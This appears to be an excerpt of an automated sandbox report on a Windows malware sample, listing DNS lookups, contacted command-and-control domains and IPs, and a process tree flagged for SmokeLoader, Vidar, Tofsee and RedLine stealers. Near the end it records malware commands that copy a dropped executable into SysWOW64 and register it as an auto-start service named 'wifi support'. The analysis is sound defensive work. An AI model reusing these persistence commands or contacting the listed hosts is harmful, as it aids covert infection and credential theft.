                                                                                                        Jan 14, 2022 20:24:25.066088915 CET8.8.8.8192.168.2.30x2983No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:25.371095896 CET8.8.8.8192.168.2.30xe2abNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:31.025305033 CET8.8.8.8192.168.2.30xf809No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:31.025305033 CET8.8.8.8192.168.2.30xf809No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:31.025305033 CET8.8.8.8192.168.2.30xf809No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:31.025305033 CET8.8.8.8192.168.2.30xf809No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:31.025305033 CET8.8.8.8192.168.2.30xf809No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                        Jan 14, 2022 20:24:36.358298063 CET8.8.8.8192.168.2.30xe4e6No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • cosjvii.net
                                                                                                          • host-data-coin-11.com
                                                                                                        • efywdpqsv.com
                                                                                                        • vucofkhoh.org
                                                                                                        • glphw.com
                                                                                                        • oyaibbgc.net
                                                                                                        • nkvfp.net
                                                                                                        • ojffxid.net
                                                                                                        • qctnjb.net
                                                                                                        • data-host-coin-8.com
                                                                                                        • vjrurwpaf.net
                                                                                                        • cadsuqagh.net
                                                                                                        • meblvhu.com
                                                                                                        • nyxemdoi.net
                                                                                                        • privacy-tools-for-you-780.com
                                                                                                        • syoeagb.org
                                                                                                        • xlertqbun.net
                                                                                                        • unicupload.top
                                                                                                        • blagu.org
                                                                                                        • kkmdou.net
                                                                                                        • qbjnsl.com
                                                                                                        • ornpwmrp.net
                                                                                                        • rlhvsc.org
                                                                                                        • rtrryuils.com
                                                                                                        • scgsgbtih.com
                                                                                                        • akyloc.org
                                                                                                        • 185.7.214.171:8080
                                                                                                        • ahoawm.net
                                                                                                        • pmfhwtjj.com
                                                                                                        • lfyjw.org
                                                                                                        • sipqy.org
                                                                                                        • jnlltxxq.com
                                                                                                        • mdbgmr.net
                                                                                                        • vxwgswks.com
                                                                                                        • ksfdeabujk.com
                                                                                                        • bsgftsru.com
                                                                                                        • hfmcm.net
                                                                                                        • hiwcjtiwj.org
                                                                                                        • tmqcl.net
                                                                                                        • opsdg.org
                                                                                                        • fdqepw.org
                                                                                                        • qbbvlw.net
                                                                                                        • giykrj.com
                                                                                                        • dnoukoye.com
                                                                                                        • fpoovg.net
                                                                                                        • inyhvk.org
                                                                                                        • oabgm.com
                                                                                                        • iaimu.net
                                                                                                        • mwapt.com
                                                                                                        • lmtsfedit.net
                                                                                                        • cvdnubldkb.net
                                                                                                        • crxfds.net
                                                                                                        • yuhcl.com
                                                                                                        • owybkq.org
                                                                                                        • 81.163.30.181
                                                                                                        • ddkkslyotn.com
                                                                                                        • qsbkvqwnoj.com
                                                                                                        • 74.201.28.62
                                                                                                        • wmqdweotts.net
                                                                                                        • vbcrt.com
                                                                                                        • yldgixbqm.org
                                                                                                        • wlqxaynuuq.org
                                                                                                        • qochog.com
                                                                                                        • drvwc.net
                                                                                                        • tsgnkffj.org
                                                                                                        • ylqihxvnug.org
                                                                                                        • tvrhmio.org
                                                                                                        • oeaexcj.net
                                                                                                        • fcifwg.net
                                                                                                        • rffngorjcd.com
                                                                                                        • bfwxl.net
                                                                                                        • takmxbc.com
                                                                                                        • ftcxosy.com
                                                                                                        • bhlwowqbr.org
                                                                                                        • ykguadbgli.com
                                                                                                        • ircqiowi.com
                                                                                                        • hnvpcgnd.com

                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        Analysis Process: ZA3cYU28Yl.exe PID: 6600 Parent PID: 5844

                                                                                                        General

                                                                                                        Start time:20:22:18
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\Desktop\ZA3cYU28Yl.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low

                                                                                                        Analysis Process: ZA3cYU28Yl.exe PID: 6620 Parent PID: 6600

                                                                                                        General

                                                                                                        Start time:20:22:19
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\Desktop\ZA3cYU28Yl.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        Analysis Process: svchost.exe PID: 5672 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:20
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: svchost.exe PID: 6112 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:20
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: svchost.exe PID: 5024 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:21
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: SgrmBroker.exe PID: 6376 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:22
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                        Imagebase:0x7ff657f80000
                                                                                                        File size:163336 bytes
                                                                                                        MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: svchost.exe PID: 3676 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:22
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: svchost.exe PID: 6812 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:22
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: explorer.exe PID: 3352 Parent PID: 6620

                                                                                                        General

                                                                                                        Start time:20:22:26
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                        Imagebase:0x7ff720ea0000
                                                                                                        File size:3933184 bytes
                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        Analysis Process: svchost.exe PID: 7100 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:44
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: svchost.exe PID: 4520 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:22:58
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        Analysis Process: rcvfbte PID: 1308 Parent PID: 664

                                                                                                        General

                                                                                                        Start time:20:22:59
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Analysis Process: rcvfbte PID: 5888 Parent PID: 1308

                                                                                                        General

                                                                                                        Start time:20:23:01
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Roaming\rcvfbte
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                        Reputation:low

                                                                                                        Analysis Process: 9460.exe PID: 6608 Parent PID: 3352

                                                                                                        General

                                                                                                        Start time:20:23:04
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\9460.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\9460.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:301056 bytes
                                                                                                        MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 46%, Metadefender, Browse
                                                                                                        • Detection: 77%, ReversingLabs
                                                                                                        Reputation:moderate

                                                                                                        Analysis Process: A019.exe PID: 3340 Parent PID: 3352

                                                                                                        General

                                                                                                        Start time:20:23:07
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 47%, ReversingLabs

                                                                                                        Analysis Process: svchost.exe PID: 1324 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:23:07
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: WerFault.exe PID: 6868 Parent PID: 1324

                                                                                                        General

                                                                                                        Start time:20:23:08
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: A019.exe PID: 5000 Parent PID: 3340

                                                                                                        General

                                                                                                        Start time:20:23:09
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A019.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:320000 bytes
                                                                                                        MD5 hash:679831CF1F00950B4ADFFBBBA7E6AB46
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                        Analysis Process: WerFault.exe PID: 4820 Parent PID: 6608

                                                                                                        General

                                                                                                        Start time:20:23:10
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                                                                                                        Imagebase:0xdd0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: 9779.exe PID: 2228 Parent PID: 3352

                                                                                                        General

                                                                                                        Start time:20:23:12
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\9779.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\9779.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:324608 bytes
                                                                                                        MD5 hash:043B44289E31BD54357F9A5C21833259
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.398828451.0000000000899000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                        Analysis Process: svchost.exe PID: 4580 Parent PID: 572

                                                                                                        General

                                                                                                        Start time:20:23:14
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: A881.exe PID: 7004 Parent PID: 3352

                                                                                                        General

                                                                                                        Start time:20:23:15
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\A881.exe
                                                                                                        Imagebase:0x400000
                                                                                                        File size:321024 bytes
                                                                                                        MD5 hash:9AF71C74219794F100EA801B528339AF
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                        Analysis Process: B217.exe PID: 4400 Parent PID: 3352

                                                                                                        General

                                                                                                        Start time:20:23:18
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Imagebase:0xa90000
                                                                                                        File size:537088 bytes
                                                                                                        MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                        Analysis Process: MpCmdRun.exe PID: 3608 Parent PID: 3676

                                                                                                        General

                                                                                                        Start time:20:23:23
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                        Imagebase:0x7ff7c6120000
                                                                                                        File size:455656 bytes
                                                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: conhost.exe PID: 1244 Parent PID: 3608

                                                                                                        General

                                                                                                        Start time:20:23:23
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: cmd.exe PID: 6520 Parent PID: 7004

                                                                                                        General

                                                                                                        Start time:20:23:23
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\gebcmxiz\
                                                                                                        Imagebase:0xd80000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: conhost.exe PID: 4588 Parent PID: 6520

                                                                                                        General

                                                                                                        Start time:20:23:24
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: cmd.exe PID: 956 Parent PID: 7004

                                                                                                        General

                                                                                                        Start time:20:23:26
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\
                                                                                                        Imagebase:0xd80000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: conhost.exe PID: 6748 Parent PID: 956

                                                                                                        General

                                                                                                        Start time:20:23:27
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: B217.exe PID: 6824 Parent PID: 4400

                                                                                                        General

                                                                                                        Start time:20:23:32
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\B217.exe
                                                                                                        Imagebase:0x1b0000
                                                                                                        File size:537088 bytes
                                                                                                        MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: sc.exe PID: 5872 Parent PID: 7004

                                                                                                        General

                                                                                                        Start time:20:23:32
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                        Imagebase:0xa70000
                                                                                                        File size:60928 bytes
                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Analysis Process: conhost.exe PID: 5932 Parent PID: 5872

                                                                                                        General

                                                                                                        Start time:20:23:33
                                                                                                        Start date:14/01/2022
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                        File size:625664 bytes
                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >